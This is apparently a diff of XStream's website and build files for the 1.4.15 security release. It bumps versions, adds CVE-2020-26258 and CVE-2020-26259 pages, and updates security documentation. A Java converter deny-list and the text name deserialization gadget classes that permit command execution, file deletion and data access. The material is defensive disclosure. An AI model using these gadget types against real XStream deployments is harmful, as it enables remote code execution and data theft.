97 || type.getName().equals("javax.imageio.ImageIO$ContainsFilter") || type.getName().equals("jdk.nashorn.internal.objects.NativeString")
98 || type == java.lang.Void.class || void.class || Proxy.isProxy(type)
99 || type.getName().startsWith("javax.crypto.") || type.getName().endsWith("$LazyIterator") || type.getName().endsWith(".ReadAllStream$FileStream"));
100 }
101
102 public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
103 throw new ConversionException("Unsupported type due to security reasons.");
104 }
105
106 public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
107 throw new ConversionException("Unsupported type due to security reasons.");
108 }
109 }, XStream.PRIORITY_LOW);
110 </pre></div>
111
112 <h2 id="credits">Credits</h2>
113
114 <p>钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.</p>
115
116 </body>
117 </html>
3333 <p>Not yet released.</p>
3434 -->
3535
36 <h1 id="1.4.15">1.4.15</h1>
37
38 <p>Released December 13, 2020.</p>
39
40 <p class="highlight">This maintenance release addresses the security vulnerabilities
41 <a href="CVE-2020-26258.html">CVE-2020-26258</a> and <a href="CVE-2020-26259.html">CVE-2020-26259</a>, when
42 unmarshalling for XStream instances with uninitialized security framework.</p>
43
44 <h2>Minor changes</h2>
45
46 <ul>
47 <li>GHI:#226: XmlFriendlyNameCoder does not accept '9' as valid character in an XML name.</li>
48 <li>GHPR:#228: DefaultMapper should handle IllegalArgumentException thrown by Class.forName().</li>
49 </ul>
50
51 <h2>Stream compatibility</h2>
52
53 <ul>
54 <li>The type jdk.nashorn.internal.objects.NativeString and the internal JAX-WS type ReadAllStream.FileStream
55 are now part of the default blacklist and the deserialization of XML containing one of the two types will fail.
56 You will have to enable these types by explicit configuration, if you need them.</li>
57 </ul>
58
59 <h2>Delivery</h2>
60
61 <p>Any XStream release can run with a minimal Java runtime environment of Java 1.4 as long as this environment will
62 process only requested classes of the jar file. Until version 1.4.14 XStream was delivered also as special Java 7
63 version for Android, because Dalvik scans all classes and fails at classes requiring a higher runtime version. However, this
64 special version will not work in a normal Java 8 environment or higher and was never meant do so.</p>
65
66 <p>Unfortunately, this version has to be build always after the standard version due to the build sequence. The
67 latest version in Maven Central however is always the one that has been deployed last independently from the time
68 of publishing. This creates an annoyance now in GitHub for any project using the Dependabot service which creates
69 automated pull requests with updates to the latest XStream version, because it injects now the special Java 7
70 version that probably breaks these projects.</p>
71
72 <p>Users who still require a special version for Java 7 will have to build this artifact now on their own. Users
73 for even older Java environments had always to do so anyway.</p>
74
3675 <h1 id="1.4.14">1.4.14</h1>
3776
3877 <p>Released November 16, 2020.</p>
4584
4685 <ul>
4786 <li>The types java.lang.ProcessBuilder and javax.imageio.ImageIO$ContainsFilter are now part of the default
48 blacklist and the deserialization of XML containing one of the two types will fail. You will must enable these
49 types by explicit configuration, if you need them.</li>
87 blacklist and the deserialization of XML containing one of the two types will fail. You will have to enable
88 these types by explicit configuration, if you need them.</li>
5089 </ul>
5190
5291 <h1 id="1.4.13">1.4.13</h1>
1717
1818 <p><a href="versioning.html">About XStream version numbers...</a></p>
1919
20 <h1 id="stable">Stable Version: <span class="version">1.4.14</span></h1>
20 <h1 id="stable">Stable Version: <span class="version">1.4.15</span></h1>
2121
2222 <ul>
23 <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.14/xstream-distribution-1.4.14-bin.zip">Binary distribution:</a></b>
23 <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.15/xstream-distribution-1.4.15-bin.zip">Binary distribution:</a></b>
2424 Contains the XStream jar files, the Hibernate and Benchmark modules and all the dependencies.</li>
25 <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.14/xstream-distribution-1.4.14-src.zip">Source distribution:</a></b>
25 <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.15/xstream-distribution-1.4.15-src.zip">Source distribution:</a></b>
2626 Contains the complete XStream project as if checked out from the Subversion version tag.</li>
27 <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.14/xstream-1.4.14.jar">XStream Core only:</a>
27 <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.15/xstream-1.4.15.jar">XStream Core only:</a>
2828 The xstream.jar only as it is downloaded automatically when it is referenced as Maven dependency.</b></li>
29 <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-hibernate/1.4.14/xstream-hibernate-1.4.14.jar">XStream Hibernate module:</a></b>
29 <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-hibernate/1.4.15/xstream-hibernate-1.4.15.jar">XStream Hibernate module:</a></b>
3030 The xstream-hibernate.jar as it is downloaded automatically when it is referenced as Maven dependency.</li>
31 <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-jmh/1.4.14/xstream-jmh-1.4.14-app.zip">XStream JMH module:</a></b>
31 <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-jmh/1.4.15/xstream-jmh-1.4.15-app.zip">XStream JMH module:</a></b>
3232 The xstream-jmh-app.zip as standalone application with start scripts and all required libraries.</li>
33 <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.14-java7/xstream-1.4.14-java7.jar">XStream Core for Java 7 only:</a>
34 The xstream.jar only <a href="faq.html#Compatibility_Android">without the Java 8 stuff</a> as it is downloaded automatically when it is referenced as Maven dependency.</b></li>
3533 </ul>
3634
3735 <h1 id="maven">Maven Central Repository</h1>
4240 <div class="Source XML"><pre>&lt;dependency&gt;
4341 &lt;groupId&gt;com.thoughtworks.xstream&lt;/groupId&gt;
4442 &lt;artifactId&gt;xstream&lt;/artifactId&gt;
45 &lt;version&gt;1.4.14&lt;/version&gt;
43 &lt;version&gt;1.4.15&lt;/version&gt;
4644 &lt;/dependency&gt;</pre></div>
4745
4846 <h1 id="previous-releases">Previous Releases</h1>
7272
7373 <h1 id="news">Latest News</h1>
7474
75 <h2 id="1.4.14"><b>November 16, 2020</b> XStream 1.4.14 released</h2>
75 <h2 id="1.4.15"><b>December 13, 2020</b> XStream 1.4.15 released</h2>
7676
77 <p class="highlight">This maintenance release addresses the security vulnerability
78 <a href="CVE-2020-26217.html">CVE-2020-26217</a>, reported originally as CVE-2017-9805 for Struts' XStream
79 Plugin, an arbitrary execution of commands when unmarshalling for XStream instances with uninitialized security
80 framework.</p>
77 <p class="highlight">This maintenance release addresses the security vulnerabilities
78 <a href="CVE-2020-26258.html">CVE-2020-26258</a> and <a href="CVE-2020-26259.html">CVE-2020-26259</a>, when
79 unmarshalling for XStream instances with uninitialized security framework.</p>
8180
82 <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p>
81 <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p>
8382
84 <p>Note, the next major release 1.5 will require Java 8.</p>
83 <p>Note, the next major release 1.5 will require Java 8.</p>
8584
8685 </body>
8786 </html>
1414 </head>
1515
1616 <body>
17
18 <h2 id="1.4.15"><b>December 13, 2020</b> XStream 1.4.15 released</h2>
19
20 <p class="highlight">This maintenance release addresses the security vulnerabilities
21 <a href="CVE-2020-26258.html">CVE-2020-26258</a> and <a href="CVE-2020-26259.html">CVE-2020-26259</a>, when
22 unmarshalling for XStream instances with uninitialized security framework.</p>
23
24 <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p>
25
26 <p>Note, the next major release 1.5 will require Java 8.</p>
1727
1828 <h2 id="1.4.14"><b>November 16, 2020</b> XStream 1.4.14 released</h2>
1929
2828
2929 <p>The provided XML data is used by XStream to unmarshal Java objects. This data can be manipulated by injecting
3030 the XML representation of other objects, that were not present at marshalling time. An attacker could take
31 advantage of this to execute arbitrary code or shell commands in the context of the server running the XStream
32 process. A concrete case is described in <a href="CVE-2013-7285.html">CVE-2013-7285</a> and
33 <a href="CVE-2020-26217.html">CVE-2020-26217</a>.</p>
34
35 <p>Note that the XML data can be manipulated on different levels. For example, manipulating values on existing
36 objects (such as a price value), or breaking the format and causing the XML parser to fail. The latter case will
37 raise an exception, but the former case must be handled by validity checks in any application which processes
38 user-supplied XML. A worst case scenario is the injection of arbitrary code or shell commands, as noted above.
31 advantage of this to access private data, delete local files, execute arbitrary code or shell commands in the
32 context of the server running the XStream process. Concrete cases are described in
33 <a href="CVE-2013-7285.html">CVE-2013-7285</a>, <a href="CVE-2020-26217.html">CVE-2020-26217</a>,
34 <a href="CVE-2020-26258.html">CVE-2020-26258</a>, and <a href="CVE-2020-26259.html">CVE-2020-26259</a>.</p>
35
36 <p>Note, that the XML data can be manipulated on different levels. For example, manipulating values on existing
37 objects (such as a price value), accessing private data, or breaking the format and causing the XML parser to fail.
38 The latter case will raise an exception, but the former case must be handled by validity checks in any application
39 which processes user-supplied XML. A worst case scenario is the injection of arbitrary code or shell commands, as noted above.
3940 Even worse, <a href="CVE-2017-7957.html">CVE-2017-7957</a> describes a case to crash the Java Virtual Machine
4041 causing a Denial of Service.</p>
4142
6364         
6465 <p>More scenarios have been identified for types that are already delivered with the Java runtime. Looking at
6566 well-known and commonly used Java libraries libraries such as ASM, CGLIB, or Groovy, the possibility for more
66 exploits is very high.</p>
67
68 <p class="hightlight">Therefore creates a black list for special classes only a scenario for a false security,
69 because no-one can assure, that no other scenario arise. A better approach is a whitelist i.e. the allowed class
70 types are setup explicitly. This will be the default for XStream 1.5.x.</p>
67 exploits is very high. A class like InvokerTransformer of Apache Commons Collections has a high potential for
68 attacks.</p>
69
70 <p class="hightlight">A blacklist for special classes only creates therefore a scenario for a false security,
71 because no-one can assure, that no other scenario arise. A better approach is the usage of a whitelist i.e. the
72 allowed class types are setup explicitly. This will be the default for XStream 1.5.x (see below).</p>
7173
7274 <p>Starting with XStream 1.4.7, an instance of the EventHandler is no longer handled by default. You have to
7375 explicitly register a ReflectionConverter for the EventHandler type, if your application has the requirement to
9092 framework supports the setup of a blacklist or whitelist scenario. Any application should use this feature to
9193 limit the danger of arbitrary command execution if it deserializes data from an external source.</p>
9294
93 <p>XStream itself sets up a black list by default, i.e. it blocks all currently known critical classes of the Java
94 runtime. Main reason for the black list is compatibility, because otherwise newer versions of XStream 1.4.x can no
95 <p>XStream itself sets up a blacklist by default, i.e. it blocks all currently known critical classes of the Java
96 runtime. Main reason for the blacklist is compatibility, because otherwise newer versions of XStream 1.4.x can no
9597 longer be used as drop-in replacement. Unfortunately this provides a false sense of security. Every XStream
9698 client should therefore switch to a whitelist on its own as soon as possible. XStream itself will use a whitelist
9799 as default starting with 1.5.x and only clients that have also changed their setup will be able to use this newer
120122 <p>Noted above, it might be possible that other combinations are found with the Java runtime itself, or other
121123 commonly-used Java libraries that allow a similar vulnerability like the known case using the Java Beans
122124 EventHandler. To prevent such a possibility at all, XStream version 1.4.7 and above contains a security framework,
123 allowing application developers to define which types are allowed to be unmarshalled with XStream.</p>
125 allowing application developers to define which types are allowed to be unmarshalled with XStream. Use
126 <a href="javadoc/com/thoughtworks/xstream/XStream.html#setupDefaultSecurity-com.thoughtworks.xstream.XStream-">XStream.setupDefaultSecurity()</a>
127 to install the default whitelist of 1.5.x already with 1.4.10 or higher.</p></p>
124128         
125129 <p>The core interface is <a href="javadoc/com/thoughtworks/xstream/security/TypePermission.html">TypePermission</a>.
126130 The <a href="javadoc/com/thoughtworks/xstream/mapper/SecurityMapper.html">SecurityMapper</a> will evaluate a list
00 <!--
11 Copyright (C) 2005, 2006 Joe Walnes.
2 Copyright (C) 2006, 2007, 2010, 2011, 2014, 2015, 2016 XStream committers.
2 Copyright (C) 2006, 2007, 2010, 2011, 2014, 2015, 2016, 2017, 2020 XStream committers.
33 All rights reserved.
44
55 The software in this package is published under the terms of the BSD
4444 </section>
4545 <section>
4646 <name>Vulnerabilities</name>
47 <page>CVE-2020-26259.html</page>
48 <page>CVE-2020-26258.html</page>
4749 <page>CVE-2020-26217.html</page>
4850 <page>CVE-2017-7957.html</page>
4951 <page>CVE-2016-3674.html</page>
1212 <parent>
1313 <groupId>com.thoughtworks.xstream</groupId>
1414 <artifactId>xstream-parent</artifactId>
15 <version>1.4.14</version>
15 <version>1.4.15</version>
1616 </parent>
1717 <artifactId>xstream-hibernate</artifactId>
1818 <packaging>jar</packaging>
1212 <parent>
1313 <groupId>com.thoughtworks.xstream</groupId>
1414 <artifactId>xstream-parent</artifactId>
15 <version>1.4.14</version>
15 <version>1.4.15</version>
1616 </parent>
1717 <artifactId>xstream-jmh</artifactId>
1818 <packaging>jar</packaging>